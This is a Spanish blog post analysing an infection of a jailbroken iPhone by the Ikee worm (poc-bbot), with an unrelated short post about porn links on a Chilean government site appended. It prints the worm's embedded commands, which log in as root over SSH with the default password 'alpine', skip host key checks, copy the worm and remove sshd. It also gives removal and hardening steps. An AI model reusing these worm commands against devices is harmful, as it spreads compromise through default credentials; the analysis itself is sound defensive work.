|1|fptvQLCbHBNg1zqT4mPVABThSA0=|deIuWKY8i/L9dHwRZSlCl4PKw50= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxQJ4+N0f1+lG/pPMkqwZKa8jMm0EC/UzKUqZMkHp/HgJYBmKN+OSq2imviKf9nnaPIOF1A8mxKGiciZYEX0sUmn/CubwaIZstSYbt6QHD7+iWh/0ha2NZuBHsRrW8KpApt5JLPBeUz7wZKncfLZfijqL+OgzEW4DrX5vxpsvRx8fmj+wFoqatGDlj5VYU8Q4WInJRZbKTAwaghvsboNHTddyNnCKRbAxVi7md43xPYp2SkoIeyYyV4rBEa5cW6ai7HZRya9M2BgwfqpDfLvqJn65Yb8gkrA5ZvncItrSMZtpAjHVDmTsfgncPuIbAocGXMUO2XAlRW+m/h2LK78xJQ==
|1|TTJOG8QzgsBCwdTsPzC+iiY1dig=|uCvq7/KZR/S72/gfVedXldYX2a4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDjKHQy+4Fzf83Y2KVHBW76qBzd/wXY0n7KeOj82sgIL+gpVruAQzv7iB6NOnauOOSREiplKDGgxpoF0ZDMGJEDVt9IarL8iBnpUEVcVFOwZuZjkeGX5vpv85cCukUZcPIMTYhAs5l2YpQ5392YxDp7OKb0QXU3k2nmikoGJfLTltxZBpulRKpkCUWkkd0NgxvQEt2oqpsLX8yKFqvvuPHvj4BUZNoxS0LXBQa4lZHv583cl4aFuGMu0XGt141FmdAMEvVE85e3H1Qj7jjAbJr2cuJd317ATcpGFLclmvM7BI0ibVTvyNG7QYVgYtMLXteSyIgWfsIvnEdfGHqfLueL
|1|z2m9fYtUH6DPO4Ab3IM9RdgSaEg=|iL2t8s6q48uiJkS5MLe9nV5D0sg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrvIwyXCZW+axDjrKc11IMl93aCw/qdtvOlnwebkOvUnUGrkKuWNtg2Nhl9g6bcIQa8VBJnUxElFzuPFDNX/xi7kiHaREPKq9mJgGFmYRw+ULfI+uNnrs3JboCbpMrPKys4H/dKehDenhFTw4Su9cOiXRvqp4SUus4R4L/SHalEXmgHOENgX6uJzV6w/5KrT7DUjOOgqYOvKPno0yhI0wviva5Ar+Cupo1VRrh2965vDrRhLcxyCHXgN27dgieXMYoPBNgWaI9ui/QyPB4iBt/38UavloegOaHC4T7Iwy1ajIShorbQC1cPkmA3zP/GToZsuRA0ub+5aCMNJIzLqpX
|1|chQtj+qS9ki/Oy+Uffh2voA5qUY=|zDzeLUej9nKWzWUI94P5S27GE7Y= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnsgAOZxON82AD1ko5BcJGH9Ps6XhWxNQp4CWdZ+0l7iv0l9RogAQ8Ri6Nr/emdwtpijgFmXJgti+av5rOA42SU35GJotX6NhQ4Ll7pjxSkDm8THbsyqLw84L6LEp/z0iXH+vEA+8POQTGWmsjWup77MDRaxxRe0mu8pY5anTxOsyExWMiCSVTuBztYYLQK/crr/aTA6/L4wDdj1ysKEg6UQ99Y7+wOTMmjRWULYxrWIZh3w9LQO3/nxOXIw4Seko7hyRZJnA7ubMmO6GmfG/hsK3EAc0EzS5lu4O9t99Py1L9IDO4fg+a+NPPNMgPW+cyVAsYy9Tj4dWrO6tUzDUEQ==
|1|ba2ggAZGQWHhghVflrnkxmdnZ+g=|BK12/pAeHmMhW7zf55Lr9C8SNnk= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2WDs8rlYtEhGPzCjBcY8fDVX0uYHYfL4Hi1diPZQeVBiZ5EKV9KrqW7fosoeFIaQWGwb6j6wQriErmbS1BoGQNTMvMFljI1goZzrBH/LllEcHvwhsAU3FQP+yV+FrNnqINlXM97OboEG+/A6OaU6oeREaV2Yv4j8zsl9Zaz3+tyDBuiuxMlOIuiGWX51al/ukwC/rnwUK8Pm6yREC0+HA7T5KFPLgeHvYb57BltIGOz+h0VrEWsZ1gxpmDWfdcoutiWnGATaV8YgsvChgo04NIoJjYfza9UwbT1lFzf1/VZwcju3Q+6jPIxeD/Qt3C6h45nUFy/J9qR61QoFZU9eh
|1|vX6S5oPp0OpfKZpnxryWtt4IlfY=|8DRLX6WICWDSOvz356w6ZIu9ZIE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdkjHQ6kLA0rQu7U7iPeijwSC0u7vruEgGxlU7O0maL2laRsdXjtpfwRrnFjW/JMcWXgFy1gs+edXyhm4121hsOxWOGofIt1BnrObCEFjG4aQLvGdl0CVK/iYQDEZZ4SP8Qbn7V5BajSQqXpUzYsMcuqspe8yttbs/D/r33jmM/iBQe38LfrzeWgX9SV4zQVgoVSmzJDlR0vta0FLVqOolLNiTPLd078W7oKU1eGZL+A0KV2uxynocKMlZmwDyQ3IndQLoBbPnmxC1MpgYVE4EE85cu5DTOCMi/O1Szy4wNmsCmOhpFin6uIjelg6or1ZIcXQ6nXIhQfmxeGqSOyub
|1|+QiwFWfhP9lb1GuBCBS0KCAlKsc=|SMs9/PS5EeX/Ybap3UHwf++7iYg= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCiHp+AXQXQyM0oIpsck65skUfoP89DagJfHi4NM1jNc1K8/s2I4S89ktqVpBJGrwUZARo3qg/QJrtoO3BEdQW5Mdym3OJnT2lcTmFmhh8tgLTllMoiZTKLVbDjDNT476R/w4oxsxDZSL5sGVexAiv8+WKbtgwEVwAV0OHsD2mHZjo5eYpqB1JZL+i+0Zl5doeMejgzEfhYdjYI2pZER1ZQrqJhSYlnkG1AUZw87kdYE3W2ievwwxJ4Yxu5AvxIVydKc5p3p0MP+hX8n/zZTbJFZtOpGJ7IVMqPeNjQJzgGiiJ7BBi9woX+h0OqkQ1acl9OTmEqCI9yxQ9yPXM4BCKj
|1|CsHezG/fJi5r2sbbP1B3v/7QY/s=|cAVngYbsb5QGb5Wt8cRJUEqJsY4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHrDv1U2iNz3pDJsxh4wOxtySHLt9eyp78GHRA+CM3w459pxbtsa7yrCbCz7UuNuY9296cewSh/NWXHCtUiWHghnD2v4zbdDZ6YNvOq5ZBxbUQPevhrtb2hg31Mk/ei1/MDSo3LTuf0OhE1Rf+rjX4MwNuEZQ4Il84YSvF5w8zD19q0wL3zNiqJdevehvuLM6bVuQVNNHJHLhBP1x2BjSqZWIvMqi00yR5HT0+bqJekm2rFPFj+0IGXGrT4RD6fXqVWtrQUjnsGAEzZib30ErJMVI18ARbNQtkHFtsxBy31RGybde4qcAGEQRqNi4yqJZb2mHRcmg9U1+R0zEpgVtl
|1|oWDRINPm6UfhiFOddlvNlFHhLwo=|0JZ6b3i4zFiN0k9IjwmhMkLY5r4= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtNtq7e0hCM6qmi+AtLdJaGsZ4kDXzRqyEEwChcPddZGCa+FlPeWktVJNLiGuLULaCjJNzkx6vsN4FV+HRO8x6z8cekR1kzoMcOGTq+GHrGABFmWRYW8MoDnkpnoUblCCnVW03zCiYepB7K0mp5lQ4jpvJrGSXTmmzN5XIGjMS1qsC+KqBWIMgJIhNRwj9a/JrV2jy9SSEp3G+miWXbs+NPYqle7sYVLt7GtE8naj/Y8GAvWACvoXMkaCACxkCZMeZBSSbxLkp2qidLMBvtSWmzzVDEZAHaNQIbzPJcqHpRlygkweL29dz3XkaSOUmGPJV8Rulkk/mHkCjW2d/eKK3

No me he conectado a ningún servidor SSH desde mi iPhone, por lo que ya empiezo a confirmar lo que está pasando. Buscando en los logs doy con algo tan sospechoso como esto:

iPhone:/var/logs root# tail -f AppleSupport/general.log 
2013-01-10 09:35:53 -0300,109,8228FBE2-733A-4BDD-B0EB-0C40A067D169,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 09:58:51 -0300,109,96ACB772-1F78-4F6A-985B-E1383332DD89,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 10:20:56 -0300,109,17EFADF9-46C2-40A1-94E2-B4F4660E6231,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 10:45:17 -0300,109,3AC9689E-DEAA-4D56-AF7F-29A5B16029AD,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 11:09:13 -0300,109,586ABA4F-4D5D-44B0-A635-AF20303F4E1D,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 12:03:55 -0300,109,7A8E9303-534A-4F44-A4D1-125EB51B276F,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883
2013-01-10 13:00:02 -0300,109,E5D8E2FB-E994-491C-B8CA-FAF26ADA877C,100,poc-bbot,KERN_PROTECTION_FAILURE at 0x00003883

Cita Textual: "No dispongo del comando "ps" en mi iphone, por lo que no puedo buscar qué proceso me la está liando. Sin embargo, al ejecutar "top" encuentro un simpático "poc-bbot" en el top 5 de procesos usando el procesador de mi iPhone. Googleando por poc-bbot, veo varios enlaces que indican que, efectivamente, tengo un bicho en el iPhone. En este caso se trata del virus Ikee, un viejo conocido (por no decir el primer virus existente para iPhone). Además cambia el fondo de pantalla por una foto de Rick Astley, tira el servicio SSH y se intenta reproducir buscando conectarse con root/alpine via SSH a otros dispositivos iPhone. Antes de ejecutar los pasos para borrarlo, me copio los ficheros propios del virus: /bin/poc-bbot, /bin/sshpass, /System/Blibrary/LaunchDaemons/com.ikey.bbot.plist y /var/lock/bbot.lock. Curioso pero los ficheros /var/log/youcanbeclosertogod.jpg y /var/mobile/LockBackground.jpg (también referenciados en los enlaces que encontré en Google) no existían en mi iPhone. Efectúo los pasos de eliminar el virus, borro los ficheros y hago un kill -9 al proceso poc-bbot que encontré con "top". Reinicio el iphone y veo que todo ha vuelto a la normalidad. Malware eliminado! Sin embargo, ahora vamos a analizar los ficheros del "bicho" que guardamos previamente. Sin embargo, ahora vamos a analizar los ficheros del "bicho" que guardamos previamente. com.ikey.bbot.plist"

Label
com.ikey.bbot
Program
/bin/poc-bbot
UserName
root
RunAtLoad

KeepAlive


 

Es un script de arranque típico en sistemas Apple que arranca al inicio el fichero /bin/poc-bbot

shinee@Wafles:~/pentest$ file poc-bbot
poc-bbot: Mach-O executable acorn

Haciendo un strings al fichero que estaba en /bin/poc-bbot vemos lo siguiente:

__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
%i.%i.%i.
/var/lock/bbot.lock
getifaddrs ******
getnameinfo() failed: %s
0.0.0.0-0.0.0.0
pdp_ip0  ******
%s.%s.%i.0-%s.%s.%i.255  ******
I know when im not wanted *sniff*
IIIIIII Just want to tell you how im feeling
192.168.0.0-192.168.255.255 ******
202.81.64.0-202.81.79.255  ******
23.98.128.0-123.98.143.255  ******
120.16.0.0-120.23.255.255  ******
114.72.0.0-114.75.255.255  ******
203.2.75.0-203.2.75.255 ******
210.49.0.0-210.49.255.255 ******
203.17.140.0-203.17.140.255 ******
203.17.138.0-203.17.138.255 ******
211.28.0.0-211.31.255.255 ******
58.160.0.0-58.175.255.25 ******
awoadqdoqjdqjwiodjqoi aaah!
Checking out the local scene yo
Random baby
%s.0-%s.255
Lannnnn
VODAPHONE
OPTUSSSS
Telstra
%i.%i.%i.%i
Oh a sheep!
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99' ******
alpine
Error is sshpass there?
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'
sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s  ******
sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'
cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg ******
rm -f /usr/sbin/sshd; killall sshd    ******
uname -n
rm /bin/sshpass
rm /bin/poc-bbot
/bin/poc-bbot
/bin/sshpass
rm /var/mobile/Library/LockBackground.jpg; echo "
 - Removed old background"
/var/log/youcanbeclosertogod.jpg
/var/mobile/Library/LockBackground.jpg
/System/Library/LaunchDaemons/com.ikey.bbot.plist
launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist ******
rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist
killall sshd  ******

• Cita textual: "He remarcado con ****** aquello que más me ha llamado la atención:
• getifaddrs -> Qué IP tengo asignada ahora?
• El interfaz pdp_ip0 es el que por defecto se levanta en las conexiones 3G en iPhone. -> supongo que será parte de la llamada a getifaddrs (pdp_ip0)
• %s.%s.%i.0-%s.%s.%i.255 -> Del direccionamiento de red que tengas en el interfaz 3G, crea una lista con todas las direcciones posibles de esa red.
• Diferentes rangos de red públicos de redes de telefonía móvil de Australia. Además está el direccionamiento privado 192.168.0.0/16, que imagino que también se asignará por parte de algún operador en Australia, al igual que hace Movistar aquí con direccionamiento 10.0.0.0/8 (al menos me he encontrado de este tipo de direccionamiento en el intefaz 3G de mi iphone un montón de veces)
• sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'  + alpine -> ¿Está claro no? Conéctate a la IP que te toque en el bucle por SSH con contraseña "alpine" y si ya te habías conectado a esa IP pero ha cambiado la key del servidor, añádela al known_hosts sin preguntar (Lo que interesa es reproducirse e infectar, claro está). Escribe un "echo 99". Imagino que así vemos si hemos acertado o no con la contraseña "alpine" de ese Iphone
• sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s -> Copia con SCP los ficheros necesarios para reproducirte en el nuevo iphone víctima
• cp /var/log/youcanbeclosertogod.jpg /var/mobile/Library/LockBackground.jpg  -> Pon a Rick Astley y su "Never gonna give you up" de fondo de pantalla
• rm -f /usr/sbin/sshd; killall sshd -> Borra el servidor SSH del iphone y mata el proceso para hacer más complicado el borrado del propio "bicho"
• launchctl load /System/Library/LaunchDaemons/com.ikey.bbot.plist -> Ejecuta lo que diga este script (típico de arranque en plataformas Apple) Pon el bicho a funcionar
• rm -f /Library/LaunchDaemons/com.openssh.sshd.plist; launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist -> Borra el script de inicio del servicio SSHd y tira el servicio actual. -> Digo yo que ¿esto tendría que ejecutarse en orden contrario no? Primero tiro el servicio con el script de arranque y luego lo borro…
• killall sshd -> Mata el servicio sshd actual

/bin/sshpass es un binario que se ejecuta como helper de poc-bbot para conectarse a las posibles víctimas y copiarles lo necesario para seguir infectando iPhones.



Conclusiones

/var/mobile/Library/LockBackground.jpg -> No existe en IOS 5.1.1 por eso que no me enteré que tenía el bicho, al no haberme cambiado el fondo de pantalla por el majete Rick Astley. Este virus era efectivo en versiones de sistema operativo de Iphone inferiores a la 4

Me vino bastante bien descargar desde Cydia una herramienta llamada Sysinfoplus. Te permite, entre otras cosas, listar los procesos que están corriendo en el iPhone así como información de conexiones de red. Me valió después de haber desinfectado el iPhone para comprobar que ya no existían más procesos sospechosos, conexiones salientes raras, carga de procesador del iPhone, etc,... Es gratuita y recomendable si tienes hecho el jailbreak

Si te instalas OpenSSH para tener acceso por SSH al iPhone, yo tendría en cuenta varias cosas:
Instala OpenSSH con los servicios 3G y Datos deshabilitados. Hazlo vía wireless.

Conéctate al dispositivo y cambia inmediatamente la contraseña de root (alpine por defecto) por algo mucho más complicado.

Haz que el servicio SSHd escuche sólo en la interfaz privada. Lo normal es que sólo lo arranques en algunas redes muy definidas (en mi caso la de casa únicamente). Para eso añade la línea "ListenAddress a.b.c.d" al final del fichero /private/etc/ssh/ssh_config. Donde a.b.c.d es la IP del interfaz wireless que asignas a tu Iphone en tu red confiable.

Que no arranque como servicio el SSHD en el iphone sí o sí. Es preferible tenerlo que levantar manualmente cuando quieras conectarte. Así minimizas el tiempo de exposición. Para ello ejecuta en consola del iphone: launchctl unload -w /Library/LaunchDaemons/com.openssh.sshd.plist

Tened cuidado con el Toggle-SSH para SB Settings, puesto que en cuanto lo utilizas, habilitará por defecto que se ejecute al arranque! Al no ser algo que se use muy a menudo, es mejor no tener la extensión de Toggle-SSH y habilitarlo/deshabilitarlo desde la propia aplicación de OpenSSH manualmente.

Teruel por supuesto que existe y el que no quiera ver que el malware para Apple cada vez está más a la orden del día debido al espectacular crecimiento de ventas y popularidad de la marca de la manzana, es querer seguir creyendo en los reyes magos. El malware para Apple es un hecho y ha llegado para quedarse! "


Toda cita textual a sido tomada desde SecuritybyDefaul y ha si identificada ente comillas "", sin embargo los datos publicados sobre la infección del equipo son propios

El objetivo de esta publicación es exponer la infección con la finalidad que le pueda servir  mas personas la publicación

Nuevamente: Links de Pornografia en Source de JUNJI CHILE

Nuevamente el sitio de JUNJI CHILE se ve afectado, ya es tercera vez que denuncio links de pornografia en su Source. Al parecer el problema de raíz no es solucionado y simplemente eliminan los links al ser denunciado.

Primera denuncia:(octubre-2012) http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html

Segunda denuncia:(diciembre 2012)  http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/

Ahora en Enero-2012 podemos ver nuevamente, links de pornogafia en el source.

Esperemos que no suceda más.